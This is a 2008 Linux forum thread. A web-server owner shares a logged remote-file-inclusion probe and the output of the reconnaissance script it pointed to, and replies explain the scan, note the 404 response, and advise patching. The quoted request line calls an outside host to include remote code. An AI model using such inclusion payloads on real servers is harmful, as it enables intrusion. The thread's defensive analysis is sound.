Linux - SecurityThis forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.
Welcome to LinuxQuestions.org, a friendly and active Linux Community.
You are currently viewing LQ as a guest. By joining our community you will have the ability to post topics, receive our newsletter, use the advanced search, subscribe to threads and access many other special features. Registration is quick, simple and absolutely free. Join our community today!
Note that registered members see fewer ads, and ContentLink is completely disabled once you log in.
If you have any problems with the registration process or your account login, please contact us. If you need to reset your password, click here.
Having a problem logging in? Please visit this page to clear all LQ-related cookies.
Introduction to Linux - A Hands on Guide
This guide was created as an overview of the Linux Operating System, geared toward new users as an exploration tour and getting started guide, with exercises at the end of each chapter.
For more advanced trainees it can be a desktop reference, and a collection of the base knowledge needed to proceed with system and network administration. This book contains many real life examples derived from the author's experience as a Linux system and network administrator, trainer and consultant. They hope these examples will help you to get a better understanding of the Linux system and that you feel encouraged to try out things on your own.
Click Here to receive this Complete Guide absolutely free.
I run a web server on my opensuse 10.x box and check access_log and error_log frequently. Today I found this entry - 220.127.116.11 - - [10/Dec/2008:06:13:24 -0500] "GET /phpproj/catalog/includes/include_once.php?include_file=http://www.jkijmond.nl/jl/response.txt%0D?? HTTP/1.1" 404 1056 "-" repeated 4 times. Just the time and date are different. I copied response.txt to my web server and ran it. This is what was displyed:
uid=30(wwwrun) gid=8(www) groups=8(www),111(vboxusers) 0sirys was here ..
uname -a: Linux zombie13 18.104.22.168-0.1-default #1 SMP 2008-10-14 22:17:43 +0200 x86_64
id: uid=30(wwwrun) gid=8(www) groups=8(www),111(vboxusers)
free: 5.13 Gb
used: 44.13 Gb
total: 49.26 Gb
Does this information present a security risk? If so what may be done to prevent attacks using this information.
I have blocked the ip range 22.214.171.124 - 126.96.36.199 to prevent further attempts coming from domainfactory GmbH.
I suppose the first thing that security geeks like me ask is, is it necessary for you to support file uploads on your server?
Any services that are not ESSENTIAL to operation should be disabled on a public-facing box.
Also, are you running the latest versions of both Apache AND PHP? (I mean that when you check your distro's update-manager you find no updates necessary.)
These zombie-makers come out of the woodwork from time to time and it's necessary to deal with them ONLY when they can affect a service you need. If you don't need it, just disable the service and update.
http://www.jkijmond.nl is now fixed. Usually, such sites are compromised (where the owner is unaware) and hosting/serving malware as third party.
I'm sure you'll see tons of such traffic in your logs (I do). As long as you know that you don't allow uploads, you're ok (but check from time to time anyways).
Oh, and one thing I'd NEVER do is download questionable code and execute it, especially without viewing and assessing the code first. Fortunately, it appears that that script was just gathering data. Someone who may be keeping a list of possible hosts to attack could use that type of data.
I run a web server on my opensuse 10.x box and check access_log and error_log frequently. Today I found this entry - ....
Does this information present a security risk? If so what may be done to ...
I have blocked the ip range 188.8.131.52 - 184.108.40.206 to prevent further ...
TIA for your advice,
Thank you for your feedback. Currently, I do not allow file uploads. Updates are done regularly, i.e. when I am notified updates are available. One discovery is my current router does not allow me to block specific ip addresses or ip ranges. The one that allows me to do that blocks my VOIP phone line.
Now that I am learning to create web sites with PHP and MySQL file uploads may be allowed in the future. My research has found specific PHP code that should enhance the security of my PHP scripts to prevent XSS, invalid input etc.
Howdy again, I just got another update email for this post and I re-read from the beginning...
Notwithstanding the fact that, ultimately, this may be originating at some zombie attempting an upload exploit, remember the critical element here... The response code: 404 (Your server told it to piss off)
Natually, zombies just roam through the web tapping everybody's door to see who was dumb enough to leave the key in the lock outside. I've had one server running three virtual hosts and they each have an entry in their log (after only one day of operating!!!) from some "Morpheus F**king Scanner" (no joke, that was the actual text in the log) zombie.
But the response codes are all 404s so there's no risk to me.
Keep patched, disable unnecessary services, and keep an eye on those logs for things that DON'T go 404...
Oh, and as unSpawn asked, please do submit any tweaks you have for scripting security, etc.
Excellent posting, btw, everyone, this is one of the first security-related threads I've seen that DIDN'T go all crazy with advice to block everyone's ip and start wearing foil hats.
Thank for the heads up regarding security. This is why I am taking things slowly, building the web aps with security in mind while researching the security issues involved hosting on a public facing serve.